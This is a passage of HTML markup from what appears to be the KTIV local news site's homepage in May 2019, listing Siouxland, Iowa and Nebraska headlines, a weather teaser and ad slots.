volunteer while on vacation.</p> </div> <a class="elementor-post__read-more" href="https://ktiv.com/2019/05/16/voluntourism-giving-back-on-the-road/"> Read More » </a> </div> </article> </div> </div> </div> <div data-id="2182b11d" class="elementor-element elementor-element-2182b11d elementor-widget elementor-widget-divider" data-element_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"></span> </div> </div> </div> <div data-id="375a9b6c" class="elementor-element elementor-element-375a9b6c elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">MORE TOP STORIES</h2> </div> </div> <div data-id="2ef36ba0" class="elementor-element elementor-element-2ef36ba0 elementor-grid-4 elementor-grid-tablet-3 elementor-grid-mobile-2 elementor-posts--thumbnail-top elementor-widget elementor-widget-posts" data-settings="{&quot;classic_columns&quot;:&quot;4&quot;,&quot;classic_row_gap&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:0},&quot;classic_columns_tablet&quot;:&quot;3&quot;,&quot;classic_columns_mobile&quot;:&quot;2&quot;}" data-element_type="posts.classic"> <div class="elementor-widget-container"> <div class="elementor-posts-container elementor-posts elementor-grid elementor-posts--skin-classic"> <article class="elementor-post elementor-grid-item post-138076 post type-post status-publish format-image has-post-thumbnail hentry category-iowa-news category-top-stories tag-aldi tag-dollar-tree tag-northern-valley-shopping-center tag-sioux-city-economic-developer-director post_format-post-format-image "> <a class="elementor-post__thumbnail__link" href="https://ktiv.com/2019/05/15/store-construction-underway-on-sioux-citys-north-side/"> <div class="elementor-post__thumbnail"><img width="768" height="438" src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Dollar-Tree1-768x438.jpg" class="attachment-medium_large size-medium_large" alt="" srcset="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Dollar-Tree1-768x438.jpg 768w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Dollar-Tree1-300x171.jpg 300w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Dollar-Tree1.jpg 783w" sizes="(max-width: 768px) 100vw, 768px" /></div> </a> <div class="elementor-post__text"> <h4 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/store-construction-underway-on-sioux-citys-north-side/"> Store construction underway on Sioux City&#8217;s north side </a> </h4> <div class="elementor-post__meta-data"> <span class="elementor-post-time"> 8:33 pm </span> </div> </div> </article> <article class="elementor-post elementor-grid-item post-138064 post type-post status-publish format-image has-post-thumbnail hentry category-agriculture category-iowa-news category-top-stories tag-food-safety-inspection-service tag-iowa tag-storm-lake tag-tyson tag-tyson-foods tag-tyson-fresh-meats tag-tyson-fresh-meats-inc tag-united-states-department-of-agriculture tag-usda post_format-post-format-image "> <a class="elementor-post__thumbnail__link" href="https://ktiv.com/2019/05/15/tyson-foods-sues-usda-over-negligent-inspections-at-storm-lake-ia-plant/"> <div class="elementor-post__thumbnail"><img width="768" height="430" src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/tysonfoodslogo-768x430.jpg" class="attachment-medium_large size-medium_large" alt="" srcset="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/tysonfoodslogo-768x430.jpg 768w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/tysonfoodslogo-300x168.jpg 300w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/tysonfoodslogo.jpg 1008w" sizes="(max-width: 768px) 100vw, 768px" /></div> </a> <div class="elementor-post__text"> <h4 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/tyson-foods-sues-usda-over-negligent-inspections-at-storm-lake-ia-plant/"> Tyson Foods sues USDA over negligent inspections at Storm Lake, IA plant </a> </h4> <div class="elementor-post__meta-data"> <span class="elementor-post-time"> 7:33 pm </span> </div> </div> </article> <article class="elementor-post elementor-grid-item post-138040 post type-post status-publish format-image has-post-thumbnail hentry category-iowa-news category-top-stories tag-m-v-sergeant-floyd tag-sergeant-floyd-river-museum-and-welcome-center post_format-post-format-image "> <a class="elementor-post__thumbnail__link" href="https://ktiv.com/2019/05/15/sergeant-floyd-river-museum-and-welcome-center-in-sioux-city-celebrate-30-years/"> <div class="elementor-post__thumbnail"><img width="768" height="362" src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Sg-Floyd-768x362.jpg" class="attachment-medium_large size-medium_large" alt="" srcset="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Sg-Floyd-768x362.jpg 768w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Sg-Floyd-300x141.jpg 300w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Sg-Floyd-e1557964605853.jpg 720w" sizes="(max-width: 768px) 100vw, 768px" /></div> </a> <div class="elementor-post__text"> <h4 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/sergeant-floyd-river-museum-and-welcome-center-in-sioux-city-celebrate-30-years/"> Sergeant Floyd River Museum and Welcome Center celebrate 30th anniversary </a> </h4> <div class="elementor-post__meta-data"> <span class="elementor-post-time"> 6:58 pm </span> </div> </div> </article> <article class="elementor-post elementor-grid-item post-138017 post type-post status-publish format-image has-post-thumbnail hentry category-top-stories tag-capstone-projects tag-ho-chunk-center tag-sioux-city-career-academy post_format-post-format-image "> <a class="elementor-post__thumbnail__link" href="https://ktiv.com/2019/05/15/sioux-city-career-academy-engineering-students-showcase-capstone-projects/"> <div class="elementor-post__thumbnail"><img width="768" height="410" src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Capstone-Pres-768x410.jpg" class="attachment-medium_large size-medium_large" alt="" srcset="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Capstone-Pres-768x410.jpg 768w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Capstone-Pres-300x160.jpg 300w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Capstone-Pres-e1557963603327.jpg 720w" sizes="(max-width: 768px) 100vw, 768px" /></div> </a> <div class="elementor-post__text"> <h4 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/sioux-city-career-academy-engineering-students-showcase-capstone-projects/"> Sioux City Career Academy engineering students showcase capstone projects </a> </h4> <div class="elementor-post__meta-data"> <span class="elementor-post-time"> 6:44 pm </span> </div> </div> </article> <article class="elementor-post elementor-grid-item post-137983 post type-post status-publish format-image has-post-thumbnail hentry category-health category-iowa-news category-top-stories tag-comfort-dogs tag-perry-creek-elementary tag-sioux-city-community-school tag-students post_format-post-format-image "> <a class="elementor-post__thumbnail__link" href="https://ktiv.com/2019/05/15/sioux-city-elementary-school-welcomes-some-special-visitors/"> <div class="elementor-post__thumbnail"><img width="768" height="430" src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Comfort-Dogs-768x430.jpg" class="attachment-medium_large size-medium_large" alt="" srcset="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Comfort-Dogs-768x430.jpg 768w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Comfort-Dogs-300x168.jpg 300w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Comfort-Dogs-e1557961718691.jpg 720w" sizes="(max-width: 768px) 100vw, 768px" /></div> </a> <div class="elementor-post__text"> <h4 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/sioux-city-elementary-school-welcomes-some-special-visitors/"> Sioux City Elementary School welcomes some special visitors </a> </h4> <div class="elementor-post__meta-data"> <span class="elementor-post-time"> 6:26 pm </span> </div> </div> </article> <article class="elementor-post elementor-grid-item post-137994 post type-post status-publish format-image has-post-thumbnail hentry category-nebraska-news category-top-stories tag-inappropriate-contact tag-students tag-winnebago-public-school tag-winnebago-school-district post_format-post-format-image "> <a class="elementor-post__thumbnail__link" href="https://ktiv.com/2019/05/15/former-winnebago-public-school-staff-member-accused-of-inappropriate-behavior/"> <div class="elementor-post__thumbnail"><img width="768" height="622" src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Winnebago-Public-School-768x622.jpg" class="attachment-medium_large size-medium_large" alt="" srcset="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Winnebago-Public-School.jpg 768w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Winnebago-Public-School-300x243.jpg 300w" sizes="(max-width: 768px) 100vw, 768px" /></div> </a> <div class="elementor-post__text"> <h4 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/former-winnebago-public-school-staff-member-accused-of-inappropriate-behavior/"> Former part-time Winnebago Public School staff member accused of inappropriate contact with students </a> </h4> <div class="elementor-post__meta-data"> <span class="elementor-post-time"> 6:00 pm </span> </div> </div> </article> <article class="elementor-post elementor-grid-item post-137955 post type-post status-publish format-image has-post-thumbnail hentry category-south-dakota-news category-top-stories tag-cat tag-north-sioux-city-police-department tag-union-county-court post_format-post-format-image "> <a class="elementor-post__thumbnail__link" href="https://ktiv.com/2019/05/15/former-north-sioux-city-police-officer-charged-with-killing-residents-cat/"> <div class="elementor-post__thumbnail"><img width="768" height="480" src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Derek-McIntosh-768x480.jpg" class="attachment-medium_large size-medium_large" alt="" srcset="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Derek-McIntosh-768x480.jpg 768w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Derek-McIntosh-300x188.jpg 300w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Derek-McIntosh-1024x640.jpg 1024w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Derek-McIntosh-e1557958453325.jpg 720w" sizes="(max-width: 768px) 100vw, 768px" /></div> </a> <div class="elementor-post__text"> <h4 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/former-north-sioux-city-police-officer-charged-with-killing-residents-cat/"> Former North Sioux City police officer charged with killing resident&#8217;s cat </a> </h4> <div class="elementor-post__meta-data"> <span class="elementor-post-time"> 5:49 pm </span> </div> </div> </article> <article class="elementor-post elementor-grid-item post-137706 post type-post status-publish format-image has-post-thumbnail hentry category-iowa-news category-top-stories tag-career-pathway tag-max-fire-box-training tag-shawn-bloemker tag-sioux-city-public-schools-foundation post_format-post-format-image "> <a class="elementor-post__thumbnail__link" href="https://ktiv.com/2019/05/15/students-get-real-life-training-with-max-fire-box/"> <div class="elementor-post__thumbnail"><img width="768" height="432" src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/V-MAX-FIRE-BOX-TRAINING-768x432.jpg" class="attachment-medium_large size-medium_large" alt="" srcset="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/V-MAX-FIRE-BOX-TRAINING-768x432.jpg 768w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/V-MAX-FIRE-BOX-TRAINING-300x169.jpg 300w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/V-MAX-FIRE-BOX-TRAINING.jpg 800w" sizes="(max-width: 768px) 100vw, 768px" /></div> </a> <div class="elementor-post__text"> <h4 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/students-get-real-life-training-with-max-fire-box/"> Students get real-life training with &#8220;Max Fire Box&#8221; </a> </h4> <div class="elementor-post__meta-data"> <span class="elementor-post-time"> 5:00 pm </span> </div> </div> </article> </div> </div> </div> <div data-id="fc570ea" class="elementor-element elementor-element-fc570ea elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h4 class="elementor-heading-title elementor-size-default"><a href="/news/">CLICK FOR MORE TOP STORIES</a></h4> </div> </div> <div data-id="527a4262" class="elementor-element elementor-element-527a4262 elementor-widget elementor-widget-wp-widget-ad_placement" data-element_type="wp-widget-ad_placement.default"> <div class="elementor-widget-container"> <div id="div-gpt-ad-3" class="div-gpt-ad div-gpt-widget"></div> <script> googletag.cmd.push(function () { googletag.display('div-gpt-ad-3'); }); </script> </div> </div> </div> </div> </div> <div data-id="17b8b0b9" class="elementor-element elementor-element-17b8b0b9 elementor-column elementor-col-33 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="332233cb" class="elementor-element elementor-element-332233cb elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h5 class="elementor-heading-title elementor-size-default">STORM TEAM 4 FORECAST</h5> </div> </div> <div data-id="7a5dad1f" class="elementor-element elementor-element-7a5dad1f elementor-hidden-desktop elementor-hidden-tablet elementor-widget elementor-widget-wp-widget-current_conditions" data-element_type="wp-widget-current_conditions.default"> <div class="elementor-widget-container"> </div> </div> <div data-id="22bd4da9" class="elementor-element elementor-element-22bd4da9 elementor-widget elementor-widget-wp-widget-pojo_recent_posts" data-element_type="wp-widget-pojo_recent_posts.default"> <div class="elementor-widget-container"> <div class="list-items"><div class="recent-post grid-item grid-one post-138175 post type-post status-publish format-image has-post-thumbnail hentry category-weather-now tag-forecast tag-storm-team-4 tag-weather post_format-post-format-image "> <div class="item-inner"> <div class="entry-thumbnail"> <a href="https://ktiv.com/2019/05/16/mostly-quiet-thursday-before-storm-chances-return/" title="Mostly quiet Thursday before storm chances return" rel="bookmark" class="image-link"> <img src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Capture31.jpg" alt="Mostly quiet Thursday before storm chances return" class="media-object" /> </a> </div> <div class="caption"> <h4 class="grid-heading entry-title"> <a href="https://ktiv.com/2019/05/16/mostly-quiet-thursday-before-storm-chances-return/" title="Mostly quiet Thursday before storm chances return" rel="bookmark">Mostly quiet Thursday before storm chances return</a> </h4> <div class="entry-meta"> </div> <div class="entry-excerpt"> <p>It will be warm with highs in some Siouxland cities nearing 90 degrees.</p> </div> <a href="https://ktiv.com/2019/05/16/mostly-quiet-thursday-before-storm-chances-return/" class="read-more">Click for forecast details...</a> </div> </div> </div></div> </div> </div> <div data-id="2a2ba3d2" class="elementor-element elementor-element-2a2ba3d2 elementor-widget elementor-widget-spacer" data-element_type="spacer.default"> <div class="elementor-widget-container"> <div class="elementor-spacer"> <div class="elementor-spacer-inner"></div> </div> </div> </div> <div data-id="66992b77" class="elementor-element elementor-element-66992b77 elementor-widget elementor-widget-wp-widget-ad_placement" data-element_type="wp-widget-ad_placement.default"> <div class="elementor-widget-container"> <div id="div-gpt-ad-1" class="div-gpt-ad div-gpt-widget"></div> <script> googletag.cmd.push(function () { googletag.display('div-gpt-ad-1'); }); </script> </div> </div> <div data-id="1e5ff904" class="elementor-element elementor-element-1e5ff904 elementor-widget elementor-widget-spacer" data-element_type="spacer.default"> <div class="elementor-widget-container"> <div class="elementor-spacer"> <div class="elementor-spacer-inner"></div> </div> </div> </div> <div data-id="f8b57f1" class="elementor-element elementor-element-f8b57f1 elementor-widget elementor-widget-global elementor-global-110760 elementor-widget-image" data-element_type="image.default"> <div class="elementor-widget-container"> <div class="elementor-image"> <a href="https://www.redcross.org/donate/cm/ktiv-pub.html" data-elementor-open-lightbox=""> <img width="300" height="50" src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/03/DONATENOW-300x50.png" class="attachment-medium size-medium" alt="Donate Now" /> </a> </div> </div> </div> <div data-id="6bed95b5" class="elementor-element elementor-element-6bed95b5 elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h5 class="elementor-heading-title elementor-size-default">CONNECT WITH KTIV</h5> </div> </div> <div data-id="2317ffc" class="elementor-element elementor-element-2317ffc elementor-shape-rounded elementor-widget elementor-widget-global elementor-global-1305 elementor-widget-social-icons" data-element_type="social-icons.default"> <div class="elementor-widget-container"> <div class="elementor-social-icons-wrapper"> <a class="elementor-icon elementor-social-icon elementor-social-icon-facebook elementor-animation-grow" href="https://www.facebook.com/ktiv4" target="_blank"> <span class="elementor-screen-only">Facebook</span> <i class="fa fa-facebook"></i> </a> <a class="elementor-icon elementor-social-icon elementor-social-icon-twitter elementor-animation-grow" href="https://twitter.com/ktivnews" target="_blank"> <span class="elementor-screen-only">Twitter</span> <i class="fa fa-twitter"></i> </a> <a class="elementor-icon elementor-social-icon elementor-social-icon-instagram elementor-animation-grow" href="https://www.instagram.com/ktiv4/" target="_blank"> <span class="elementor-screen-only">Instagram</span> <i class="fa fa-instagram"></i> </a> <a class="elementor-icon elementor-social-icon elementor-social-icon-envelope elementor-animation-grow" href="http://www.ktiv.com/story/8398816/contact-ktiv" target="_blank"> <span class="elementor-screen-only">Envelope</span> <i class="fa fa-envelope"></i> </a> </div> </div> </div> <div data-id="14499956" class="elementor-element elementor-element-14499956 elementor-widget elementor-widget-wp-widget-recent-posts" data-element_type="wp-widget-recent-posts.default"> <div class="elementor-widget-container"> <h5>UP TO THE MINUTE</h5> <ul> <li> <a href="https://ktiv.com/2019/05/16/markets-right-now-stocks-rise-buoyed-by-walmart-cisco/">Markets Right Now: Stocks rise, buoyed by Walmart, Cisco</a> </li> <li> <a href="https://ktiv.com/2019/05/16/former-nebraska-state-senator-cited-for-urinating-in-public/">Former Nebraska state senator cited for urinating in public</a> </li> <li> <a href="https://ktiv.com/2019/05/16/woman-4-children-killed-in-central-missouri-crash/">Woman, 4 children killed in central Missouri crash</a> </li> <li> <a href="https://ktiv.com/2019/05/16/lawsuit-targets-strip-searches-of-women-at-michigan-jail/">Lawsuit targets strip searches of women at Michigan jail</a> </li> <li> <a href="https://ktiv.com/2019/05/16/officials-think-mountain-lion-likely-has-left-des-moines/">Officials think mountain lion likely has left Des Moines</a> </li> <li> <a href="https://ktiv.com/2019/05/16/board-reveres-clearing-of-officer-in-veteran-detention/">Board reveres clearing of officer in veteran detention</a> </li> <li> <a href="https://ktiv.com/2019/05/16/mostly-quiet-thursday-before-storm-chances-return/">Mostly quiet Thursday before storm chances return</a> </li> </ul> </div> </div> </div> </div> </div> </div> </div> </section> <div data-id="74562591" class="elementor-element elementor-element-74562591 elementor-widget elementor-widget-divider" data-element_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"></span> </div> </div> </div> <div data-id="35ae95e4" class="elementor-element elementor-element-35ae95e4 elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Iowa News</h2> </div> </div> <div data-id="283b772d" class="elementor-element elementor-element-283b772d elementor-grid-4 elementor-grid-tablet-2 elementor-grid-mobile-1 elementor-posts--thumbnail-top elementor-widget elementor-widget-posts" data-settings="{&quot;classic_row_gap&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:0},&quot;classic_columns&quot;:&quot;4&quot;,&quot;classic_columns_tablet&quot;:&quot;2&quot;,&quot;classic_columns_mobile&quot;:&quot;1&quot;}" data-element_type="posts.classic"> <div class="elementor-widget-container"> <div class="elementor-posts-container elementor-posts elementor-grid elementor-posts--skin-classic"> <article class="elementor-post elementor-grid-item post-138076 post type-post status-publish format-image has-post-thumbnail hentry category-iowa-news category-top-stories tag-aldi tag-dollar-tree tag-northern-valley-shopping-center tag-sioux-city-economic-developer-director post_format-post-format-image "> <a class="elementor-post__thumbnail__link" href="https://ktiv.com/2019/05/15/store-construction-underway-on-sioux-citys-north-side/"> <div class="elementor-post__thumbnail"><img width="300" height="171" src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Dollar-Tree1-300x171.jpg" class="attachment-medium size-medium" alt="" srcset="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Dollar-Tree1-300x171.jpg 300w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Dollar-Tree1-768x438.jpg 768w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Dollar-Tree1.jpg 783w" sizes="(max-width: 300px) 100vw, 300px" /></div> </a> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/store-construction-underway-on-sioux-citys-north-side/"> Store construction underway on Sioux City&#8217;s north side </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-138064 post type-post status-publish format-image has-post-thumbnail hentry category-agriculture category-iowa-news category-top-stories tag-food-safety-inspection-service tag-iowa tag-storm-lake tag-tyson tag-tyson-foods tag-tyson-fresh-meats tag-tyson-fresh-meats-inc tag-united-states-department-of-agriculture tag-usda post_format-post-format-image "> <a class="elementor-post__thumbnail__link" href="https://ktiv.com/2019/05/15/tyson-foods-sues-usda-over-negligent-inspections-at-storm-lake-ia-plant/"> <div class="elementor-post__thumbnail"><img width="300" height="168" src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/tysonfoodslogo-300x168.jpg" class="attachment-medium size-medium" alt="" srcset="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/tysonfoodslogo-300x168.jpg 300w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/tysonfoodslogo-768x430.jpg 768w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/tysonfoodslogo.jpg 1008w" sizes="(max-width: 300px) 100vw, 300px" /></div> </a> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/tyson-foods-sues-usda-over-negligent-inspections-at-storm-lake-ia-plant/"> Tyson Foods sues USDA over negligent inspections at Storm Lake, IA plant </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-138040 post type-post status-publish format-image has-post-thumbnail hentry category-iowa-news category-top-stories tag-m-v-sergeant-floyd tag-sergeant-floyd-river-museum-and-welcome-center post_format-post-format-image "> <a class="elementor-post__thumbnail__link" href="https://ktiv.com/2019/05/15/sergeant-floyd-river-museum-and-welcome-center-in-sioux-city-celebrate-30-years/"> <div class="elementor-post__thumbnail"><img width="300" height="141" src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Sg-Floyd-300x141.jpg" class="attachment-medium size-medium" alt="" srcset="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Sg-Floyd-300x141.jpg 300w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Sg-Floyd-768x362.jpg 768w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Sg-Floyd-e1557964605853.jpg 720w" sizes="(max-width: 300px) 100vw, 300px" /></div> </a> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/sergeant-floyd-river-museum-and-welcome-center-in-sioux-city-celebrate-30-years/"> Sergeant Floyd River Museum and Welcome Center celebrate 30th anniversary </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-137983 post type-post status-publish format-image has-post-thumbnail hentry category-health category-iowa-news category-top-stories tag-comfort-dogs tag-perry-creek-elementary tag-sioux-city-community-school tag-students post_format-post-format-image "> <a class="elementor-post__thumbnail__link" href="https://ktiv.com/2019/05/15/sioux-city-elementary-school-welcomes-some-special-visitors/"> <div class="elementor-post__thumbnail"><img width="300" height="168" src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Comfort-Dogs-300x168.jpg" class="attachment-medium size-medium" alt="" srcset="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Comfort-Dogs-300x168.jpg 300w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Comfort-Dogs-768x430.jpg 768w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Comfort-Dogs-e1557961718691.jpg 720w" sizes="(max-width: 300px) 100vw, 300px" /></div> </a> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/sioux-city-elementary-school-welcomes-some-special-visitors/"> Sioux City Elementary School welcomes some special visitors </a> </h3> </div> </article> </div> </div> </div> <div data-id="e1e5df2" class="elementor-element elementor-element-e1e5df2 elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h4 class="elementor-heading-title elementor-size-default"><a href="/iowa-news/">CLICK FOR MORE IOWA NEWS</a></h4> </div> </div> <div data-id="70494b13" class="elementor-element elementor-element-70494b13 elementor-widget elementor-widget-divider" data-element_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"></span> </div> </div> </div> <div data-id="e391554" class="elementor-element elementor-element-e391554 elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Nebraska News</h2> </div> </div> <div data-id="338bd4b" class="elementor-element elementor-element-338bd4b elementor-grid-4 elementor-grid-tablet-2 elementor-grid-mobile-1 elementor-posts--thumbnail-top elementor-widget elementor-widget-posts" data-settings="{&quot;classic_row_gap&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:0},&quot;classic_columns&quot;:&quot;4&quot;,&quot;classic_columns_tablet&quot;:&quot;2&quot;,&quot;classic_columns_mobile&quot;:&quot;1&quot;}" data-element_type="posts.classic"> <div class="elementor-widget-container"> <div class="elementor-posts-container elementor-posts elementor-grid elementor-posts--skin-classic"> <article class="elementor-post elementor-grid-item post-137994 post type-post status-publish format-image has-post-thumbnail hentry category-nebraska-news category-top-stories tag-inappropriate-contact tag-students tag-winnebago-public-school tag-winnebago-school-district post_format-post-format-image "> <a class="elementor-post__thumbnail__link" href="https://ktiv.com/2019/05/15/former-winnebago-public-school-staff-member-accused-of-inappropriate-behavior/"> <div class="elementor-post__thumbnail"><img width="300" height="243" src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Winnebago-Public-School-300x243.jpg" class="attachment-medium size-medium" alt="" srcset="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Winnebago-Public-School-300x243.jpg 300w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/Winnebago-Public-School.jpg 768w" sizes="(max-width: 300px) 100vw, 300px" /></div> </a> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/former-winnebago-public-school-staff-member-accused-of-inappropriate-behavior/"> Former part-time Winnebago Public School staff member accused of inappropriate contact with students </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-137624 post type-post status-publish format-image has-post-thumbnail hentry category-nebraska-news category-top-stories tag-brian-van-berkum tag-ed-mahon tag-shooting tag-south-sioux-city tag-south-sioux-city-police post_format-post-format-image "> <a class="elementor-post__thumbnail__link" href="https://ktiv.com/2019/05/15/update-ssc-officer-injured-in-the-line-of-duty-expected-to-return-home-thursday/"> <div class="elementor-post__thumbnail"><img width="300" height="176" src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/officer-van-berkum-web-300x176.jpg" class="attachment-medium size-medium" alt="" srcset="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/officer-van-berkum-web-300x176.jpg 300w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/officer-van-berkum-web.jpg 738w" sizes="(max-width: 300px) 100vw, 300px" /></div> </a> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/update-ssc-officer-injured-in-the-line-of-duty-expected-to-return-home-thursday/"> UPDATE: SSC officer injured in the line of duty expected to return home Thursday </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-137887 post type-post status-publish format-image has-post-thumbnail hentry category-2019-flooding category-nebraska-news category-top-stories tag-disaster-recovery-center tag-federal-emergency-management-agency tag-fema tag-flooding post_format-post-format-image "> <a class="elementor-post__thumbnail__link" href="https://ktiv.com/2019/05/15/nebraska-disaster-recovery-centers-to-close-may-17/"> <div class="elementor-post__thumbnail"><img width="300" height="170" src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/03/Nebraska-Flooding-MGN-300x170.jpg" class="attachment-medium size-medium" alt="" srcset="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/03/Nebraska-Flooding-MGN-300x170.jpg 300w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/03/Nebraska-Flooding-MGN.jpg 707w" sizes="(max-width: 300px) 100vw, 300px" /></div> </a> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/15/nebraska-disaster-recovery-centers-to-close-may-17/"> Nebraska disaster recovery centers to close May 17 </a> </h3> </div> </article> <article class="elementor-post elementor-grid-item post-137600 post type-post status-publish format-image has-post-thumbnail hentry category-iowa-news category-nebraska-news category-south-dakota-news 